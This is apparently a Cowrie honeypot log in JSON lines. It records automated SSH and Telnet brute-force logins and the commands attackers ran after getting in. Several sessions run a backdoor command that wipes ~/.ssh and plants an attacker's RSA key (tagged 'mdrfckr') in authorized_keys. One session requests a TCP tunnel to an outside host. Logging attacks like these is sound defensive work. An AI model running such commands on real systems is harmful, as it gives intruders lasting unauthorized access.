{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:53:50.391161Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:53:51.040882Z","src_ip":"45.150.34.92","session":"6210d17fcdf7"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"1234567890","message":"login attempt [nexus/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T23:53:51.094813Z","src_ip":"45.150.34.92","session":"6210d17fcdf7"}
{"eventid":"cowrie.login.success","username":"root","password":"000000","message":"login attempt [root/000000] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:53:51.427957Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:53:51.946884Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:53:51.947668Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:53:51.948630Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:52.114163Z","src_ip":"45.150.34.92","session":"6210d17fcdf7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:52.199773Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":43622,"dst_ip":"1.2.3.4","dst_port":22,"session":"96f9aa46945c","protocol":"ssh","message":"New connection: 93.113.63.124:43622 (1.2.3.4:22) [session: 96f9aa46945c]","sensor":"my-vps","timestamp":"2025-09-08T23:53:52.404391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:53:52.405260Z","src_ip":"93.113.63.124","session":"96f9aa46945c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:53:52.464164Z","src_ip":"93.113.63.124","session":"96f9aa46945c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:53:52.800115Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:53:52.800989Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.login.failed","username":"supervisor","password":"qwerty","message":"login attempt [supervisor/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T23:53:52.803902Z","src_ip":"93.113.63.124","session":"96f9aa46945c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:53:53.052567Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:53.053493Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":59854,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fe62ddb6ab3","protocol":"ssh","message":"New connection: 182.18.161.165:59854 (1.2.3.4:22) [session: 6fe62ddb6ab3]","sensor":"my-vps","timestamp":"2025-09-08T23:53:53.300756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:53:53.301913Z","src_ip":"182.18.161.165","session":"6fe62ddb6ab3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:53:53.551031Z","src_ip":"182.18.161.165","session":"6fe62ddb6ab3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:53.921073Z","src_ip":"93.113.63.124","session":"96f9aa46945c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:53:54.590703Z","src_ip":"182.18.161.165","session":"6fe62ddb6ab3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:55.841947Z","src_ip":"182.18.161.165","session":"6fe62ddb6ab3"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":59870,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2a3db6590ab","protocol":"ssh","message":"New connection: 182.18.161.165:59870 (1.2.3.4:22) [session: d2a3db6590ab]","sensor":"my-vps","timestamp":"2025-09-08T23:53:56.085815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:53:56.086509Z","src_ip":"182.18.161.165","session":"d2a3db6590ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:53:56.331966Z","src_ip":"182.18.161.165","session":"d2a3db6590ab"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:53:57.352412Z","src_ip":"182.18.161.165","session":"d2a3db6590ab"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:57.598207Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:57.599118Z","src_ip":"182.18.161.165","session":"d2a3db6590ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44740,"dst_ip":"1.2.3.4","dst_port":22,"session":"9030e602d821","protocol":"ssh","message":"New connection: 212.227.235.229:44740 (1.2.3.4:22) [session: 9030e602d821]","sensor":"my-vps","timestamp":"2025-09-08T23:54:16.623916Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:16.787386Z","src_ip":"212.227.235.229","session":"9030e602d821"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30950,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdaabecbd2f0","protocol":"telnet","message":"New connection: 212.227.235.229:30950 (1.2.3.4:23) [session: fdaabecbd2f0]","sensor":"my-vps","timestamp":"2025-09-08T23:54:29.358042Z"}
{"eventid":"cowrie.session.closed","duration":0.0014233589172363281,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:29.359387Z","src_ip":"212.227.235.229","session":"fdaabecbd2f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30983,"dst_ip":"1.2.3.4","dst_port":23,"session":"3819d14c55d9","protocol":"telnet","message":"New connection: 212.227.235.229:30983 (1.2.3.4:23) [session: 3819d14c55d9]","sensor":"my-vps","timestamp":"2025-09-08T23:54:29.440362Z"}
{"eventid":"cowrie.session.closed","duration":0.08539676666259766,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:29.525693Z","src_ip":"212.227.235.229","session":"3819d14c55d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31055,"dst_ip":"1.2.3.4","dst_port":23,"session":"37fb8f4a5b35","protocol":"telnet","message":"New connection: 212.227.235.229:31055 (1.2.3.4:23) [session: 37fb8f4a5b35]","sensor":"my-vps","timestamp":"2025-09-08T23:54:29.609467Z"}
{"eventid":"cowrie.session.closed","duration":0.08492565155029297,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:29.694324Z","src_ip":"212.227.235.229","session":"37fb8f4a5b35"}
{"eventid":"cowrie.session.connect","src_ip":"49.245.109.137","src_port":56942,"dst_ip":"1.2.3.4","dst_port":23,"session":"1781230e8abd","protocol":"telnet","message":"New connection: 49.245.109.137:56942 (1.2.3.4:23) [session: 1781230e8abd]","sensor":"my-vps","timestamp":"2025-09-08T23:54:31.562980Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47504,"dst_ip":"1.2.3.4","dst_port":22,"session":"65d886827760","protocol":"ssh","message":"New connection: 212.227.125.160:47504 (1.2.3.4:22) [session: 65d886827760]","sensor":"my-vps","timestamp":"2025-09-08T23:54:37.867674Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:37.868712Z","src_ip":"212.227.125.160","session":"65d886827760"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47769,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2baec2053cd","protocol":"ssh","message":"New connection: 212.227.125.160:47769 (1.2.3.4:22) [session: a2baec2053cd]","sensor":"my-vps","timestamp":"2025-09-08T23:54:37.979954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:54:37.981238Z","src_ip":"212.227.125.160","session":"a2baec2053cd"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T23:54:38.094256Z","src_ip":"212.227.125.160","session":"a2baec2053cd"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:54:38.433986Z","src_ip":"212.227.125.160","session":"a2baec2053cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T23:54:38.548833Z","session":"a2baec2053cd"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":43022,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc7fb0a75f0e","protocol":"ssh","message":"New connection: 46.101.8.63:43022 (1.2.3.4:22) [session: dc7fb0a75f0e]","sensor":"my-vps","timestamp":"2025-09-08T23:54:41.721220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:54:41.721903Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:54:41.743022Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.login.success","username":"root","password":"He@123456","message":"login attempt [root/He@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:54:41.870243Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:54:41.968262Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:54:41.968958Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:54:41.970012Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:41.992322Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:54:42.052114Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:54:42.052838Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
